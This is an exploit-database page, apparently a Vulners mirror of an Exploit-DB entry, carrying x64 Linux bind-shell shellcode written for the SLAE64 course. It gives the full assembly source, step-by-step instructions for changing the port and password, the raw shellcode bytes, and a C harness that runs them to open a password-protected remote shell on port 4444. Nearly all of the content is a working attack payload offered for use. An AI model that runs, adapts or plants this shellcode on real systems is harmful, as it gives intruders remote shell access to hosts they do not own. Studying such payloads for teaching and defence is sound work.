Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TCP Bindshell with Password Prompt - 162 bytes

🗓️ 02 Jan 2016 00:00:00Reported by Sathish kumarType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 22 Views

x64 Linux TCP bindshell with configurable password promp

Code
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title:            tcp bindshell with password prompt in 162 bytes 
*Author:           Sathish kumar
*Contact:          https://www.linkedin.com/in/sathish94
*Description:      x64 Linux bind TCP port shellcode on port 4444 with reconfigurable password
*Tested On:        Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run:        gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
*                   ./bindshell
*                   nc localhost 4444
* 
*/
 
/* 
* NOTE: This C code binds on port 4444 
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
*  					port.py
*          				import socket
*		   				port = 4444
*          				hex(socket.htons(port))
*  					python port.py 
*  					Result : 0x5c11 
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* 					nasm -felf64 filename.nasm -o filename.o
* 					ld filename.o -o filename
* To inspect for nulls
* 					objdump -M intel -D filename.o


global _start

_start:
    
    jmp sock
	prompt: db 'Passcode' ; initilization of prompt data
	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; SOCK_STREAM = 1
	; syscall number 41 

sock:
	
	xor rax, rax    ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
	xor rsi, rsi 
	mul rsi       
	push byte 0x2   ;pusing argument to the stack
	pop rdi         ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
	inc esi         ; already rsi is 0 so incrementing the rsi register will make it 1
	push byte 0x29  ; pushing the syscall number into the rax by using stack
	pop rax
	syscall
	
	; copying the socket descripter from rax to rdi register so that we can use it further 

	xchg rax, rdi
	
	; server.sin_family = AF_INET 
	; server.sin_port = htons(PORT)
	; server.sin_addr.s_addr = INADDR_ANY
	; bzero(&server.sin_zero, 8)
	; setting up the data sctructure
	
	push 0x2			             ;AF_INET value is 2 so we are pushing 0x2
    mov word [rsp + 2],0x5c11        ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions 
    push rsp                         ; saving the complete argument to rsi register
    pop rsi  						 
    
    
	; bind(sock, (struct sockaddr *)&server, sockaddr_len)
	; syscall number 49
	
	push rdx          				; Inserting the null to the stack 
	push byte 0x10                  
	pop rdx							; value of the rdx register is set to 16 size sockaddr
	push byte 0x31                   
	pop rax							; rax register is set with 49 syscall for bind
	syscall
	
	;listen the sockets for the incomming connections	 
	; listen(sock, MAX_CLIENTS)
	; syscall number 50
	
	pop rsi
	push 0x32
	pop rax                          ; rax register is set to 50 syscall for listen
	syscall
	
	; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
 	;syscall number 43
 	
 	push 0x2b
	pop rax                           ; rax register is set to 43 syscall for accept
 	syscall
 	
 	; storing the client socket description
	mov r9, rax
	
	; close parent
	push 0x3
	pop rax                            ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent
	syscall

	xchg rdi , r9
	xor rsi , rsi

	; initilization of dup2
	push 0x3                           
	pop rsi								; setting argument to 3 



duplicate:
    dec esi                            
    mov al, 0x21                       ;duplicate syscall applied to error,output and input using loop
    syscall
    jne duplicate
    
	                                   ; Prompt for password
	xor rax, rax                      
	inc al                             ; rax register to value 1 syscall for write
	push rax	
	pop rdi							   ; rdi register to value 1
	lea rsi, [rel prompt]
	xor rdx, rdx                       ; xor the rdx register to clear the previous values
	push 0xe
	pop rdx
	syscall
	
									   ; checking the password using read
password_check:
	
	push rsp
	pop rsi
	xor rax, rax   ; system read syscall value is 0 so rax is set to 0
	syscall
	push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
	pop rax
	lea rdi, [rel rsi]
	scasd           ; comparing the user input and stored password in the stack
	jne Exit
	
    
execve:                                      ; Execve format  , execve("/bin/sh", 0 , 0)
     xor rsi , rsi
     mul rsi                                 ; zeroed rax , rdx register 
     push ax                                 ; terminate string with null
     mov rbx , 0x68732f2f6e69622f            ; "/bin//sh"  in reverse order 
     push rbx
     push rsp
     pop rdi                                 ; set RDI
     push byte 0x3b                          ; execve syscall number (59)
     pop rax
     syscall

Exit:

	 ;Exit shellcode if password is wrong
	 push 0x3c
	 pop rax        ;syscall number for exit is 60
	 xor rdi, rdi 
	 syscall
     
*/     


#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
//Port number this can be obtained from the above instrcutions
"\x11\x5c"
"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\x9d\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05"
//Password this can be obtained by
/*
 * python 
 * 			password = 'hack' 
 * 			(password[::-1]).encode('hex')
 * 			Reuslt : 6b636168 
 * 	This is stored in reverse beacuse of stack
 * 
 * 
 */ 
"\x68\x68\x61\x63\x6b"
"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";


main()
{

	printf("Shellcode Length:  %d\n", (int)strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jan 2016 00:00Current
7.4High risk
Vulners AI Score7.4
securitytcplinuxshellcodebindshellpassword promptubuntu 14.04slae64-1408gccnc commandsocketsyscallportnasmobjdumpaf_inetsock_streamhtonssockaddrlistenacceptclose parentdup2
22